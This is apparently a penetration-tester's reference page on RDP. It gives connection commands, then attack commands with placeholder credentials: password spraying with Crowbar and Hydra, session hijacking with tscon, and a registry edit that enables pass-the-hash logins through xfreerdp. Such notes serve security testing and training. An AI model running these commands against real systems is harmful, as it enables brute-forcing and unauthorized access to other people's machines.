RDP

ABOUT

Remote Desktop Protocol (RDP) is a protocol developed by Microsoft for remote access to a computer running the Windows OS. This protocol allows display and control commands to be transmitted via the GUI encrypted over IP networks. Works at Application Layer of TCP/IP model, typically using TCP/3389 port. If Network Address Translation (NAT) is used on the route between client and server, as is often the case with Internet connections, the remote computer needs the public IP address to reach the server. It uses TLS/SSL.

Connecting

Rdesktop

rdesktop -u carni17 -p 'amogus' -d domain.kek 13.13.13.13

Xfreerdp

xfreerdp /u:carni17 /p:amogus /v:13.13.13.13 /d:domain.kek /cert:ignore
# Connect with port-forwarding
xfreerdp /u:carni17 /p:amogus /v:localhost:3389 /d:domain.kek /cert:ignore

Remmina (GUI)

reminna

Password Spraying

Crowbar

crowbar -b rdp -s 13.13.13.13/32 -U users.txt -c 'amogus'

Hydra

hydra -L users.txt -p 'amogus' 13.13.13.13 rdp

Session Hijacking

We need SYSTEM privileges and use tscon.exe (allows to connect to another desktop session) [LINK]

tscon 13 /dest:CARN3

Pass-The-Hash

By default, Windows has disabled Restricted Admin Mode, and we need to fix that by adding new registry key to DisableRestrictedAdmin

reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

And then to use xfreerdp for Pass The Hash

xfreerdp /v:13.13.13.13 /u:carni7 /pth:12379NSKDFKSJDF20931C031

Tips2Hack

Nmap RDP Scan

nmap -sV -sC 13.13.13.13 -p3389 --script rdp*

RDP Security Check [LINK]

./rdp-sec-check.pl 13.13.13.13

Initiate an RDP Session via xfreerdp (or Remmina with GUI)

xfreerdp /u:carni17 /p:"amogus" /v:13.13.13.13 /cert:ignore /d:DOMAIN

PreviousSSH NextSMTP

Last updated 1 month ago